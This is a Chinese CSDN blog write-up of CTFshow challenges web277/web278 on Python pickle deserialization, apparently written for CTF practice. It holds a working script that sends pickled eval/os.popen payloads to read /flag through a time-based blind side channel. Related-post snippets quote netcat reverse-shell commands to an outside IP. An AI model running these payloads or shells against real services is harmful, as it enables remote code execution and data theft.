[CTFSHOW][反序列化]web277、web278:python反序列化漏洞

已于 2022-06-03 21:48:36 修改
阅读量872 收藏 1
点赞数 1
分类专栏: ctfshow 文章标签: web安全
于 2022-06-03 21:45:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53958123/article/details/125116354
版权

当时没有公网IP的服务器,用不了nc,就测试了能不能利用无回显sleep盲打脚本来弹出flag。

先测试了以下sleep 5命令执行成功。

用之前盲打脚本改了一下:

import requests
import time
import string
import pickle
import base64
result=""
str="_-{}"+string.ascii_letters+string.digits  #大小写字母和数字
url="http://bb8bc8a0-44fa-4239-b433-9de790a37f54.challenge.ctf.show/backdoor?data="

payload="__import__('os').popen('if [ `cat /flag|cut -c {0}` == {1} ];then sleep 3;fi').read()"

class Rce():
	def __init__(self,payload):
		self.code=payload
	def __reduce__(self):
		# print(self.code)
		return (eval,(self.code,))


length=50  #length长度
key=0
for j in range(1,length):
	if key==1:
		break
	for n in str:
		rser = bytes.decode(base64.b64encode(pickle.dumps(Rce(payload.format(j,n)))))
		target=url+rser
		# print(target)
		try:
			requests.get(target,timeout=(2.5,2.5))
		except:
		    result=result+n
		    print(result)
		    break
		# if n=='9':
		# 	key=1

u95ugu
关注
专栏目录
CTFshow 反序列化 web277
Kradress的博客
02-12 601
目录源码题解总结 源码 查看源代码 提示pickle,得知考点是pickle反序列化 题解 exp 试了几次不能用bash,最后用了/bin/sh,因为环境里面没有装bash,得不到响应nc连上就会自动断开 import base64 import pickle class shell(object): def __reduce__(self): return (eval, ("__import__('os').system('nc 119.91.26.229 9999
CTFshow 反序列化 web278
Kradress的博客
02-12 222
目录思路题解总结 思路 题目提示了过滤了os.system,那么我们把system改成popen().read() 题解 import base64 import pickle class shell(object): def __reduce__(self): return (eval, ("__import__('os').popen('nc 119.91.26.229 9999 -e /bin/sh').read()",)) k = shell() print(bas
ctfshow-web入门-sql注入(web224-web230)文件类型注入、routines存储过程与函数状态、handler语句、预处理prepare+execute
Welcome To Myon'Blog !
08-19 1236
也就是将表名 ctfshow_user 改为了 ctfshow_flagasa,将字段名 username 改为 flag,之后我们就可以使用万能密码 1' or 1=1# 查出 flag。PREPARE 语句准备好一条 SQL 语句,并分配给这条 SQL 语句一个名字供之后调用,通过EXECUTE 命令执行,最后使用 DEALLOCATE PREPARE 命令释放。
python pickle反序列化漏洞_渗透测试 - 黑客技术 | 【技术分享】记CTF比赛中发现的Python反序列化漏洞_吾爱漏洞...
weixin_39618121的博客
12-12 691
写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程中我第一次在Python中发现了序列化漏洞。在我们的比赛过程中,有两个挑战中涉及到了能够接受序列化对象的Python库,而我们通过研究发现,这些Python库中存在的安全漏洞将有可能导致远程代码执行(RCE)。由于我发现网上关于这方面的参考资料非常散乱,查找...
Python反序列化
qq_61209261的博客
07-31 1588
python反序列化
ctf.show反序列化(web254-web278)
wanan的博客
08-31 7947
ctf.show反序列化(web254-web278)
weblogic反序列化全版本漏洞利用工具
06-27
weblogic反序列化全版本漏洞利用工具,可执行命令
python反序列化漏洞 任意代码执行
01-20
这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码...
基于Python语言的ShiroScan:全面检测Shiro反序列化漏洞的设计源码
最新发布
10-04
本项目为基于Python语言的ShiroScan设计源码,旨在全面检测Shiro反序列化漏洞。项目包含32个文件,涵盖15个Python源代码文件、14个Python编译文件、1个Markdown文档、1个Java ARchive文件和1个文本文件。该工具专注...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 950
详细讲解pickle
Ctfshow python for test mysql
qq_45427131的博客
06-06 95
import threading import requests url1 = "http://fe9bdd81-5686-4588-a6b2-37f03fda52f3.challenge.ctf.show:8080/index.php?id=1'/**/union/**/select/**/1," def dataname(url): c='' for j in range(1,5): for i in range(35,127): ur=ur
CTFshow——web入门——反序列化web254-web278 详细Writeup
Leaf_initial的博客
08-24 2639
在做题之前先简要总结一下知识点。
ctfshow web 反序列化(web254-278)
qq_50589021的博客
09-04 7347
知识储备 随笔分类 - PHP常识 PHP中的魔术变量: __sleep() //执行serialize()时,先会调用这个函数 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过) __construct() //当对象被创建时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 3036
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
ctfshow web入门 php反序列化 web275--web278(无web276)
2301_81040377的博客
05-10 522
后面的内容,但是作者这里用了两个。这道题和序列化一点关系都没有。是文件内容,但是外面的这个。python序列化,EXP。这里其实就可以理解为我传。就是输入流得到的内容就是。来混淆,filter的。
CTFshow 爆破 web27
Kradress的博客
10-28 442
点击录取名单可以得到一份表格,然后根据姓名身份证在学生学籍信息查询系统查询。中间八位是出生年月日,我们可以用bp爆破,前四位年份1980-2021 月份01-12 日期1-30
CTFshow-web入门-php_unserialize-web254-278
m0_72655585的博客
07-17 1691
PHP 序列化及反序列化基础反序列化学习笔记[CTF]PHP反序列化总结。
ctfshow web入门 java web279-283
m0_62207170的博客
04-22 523
ctfshow web入门 java web279-283
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值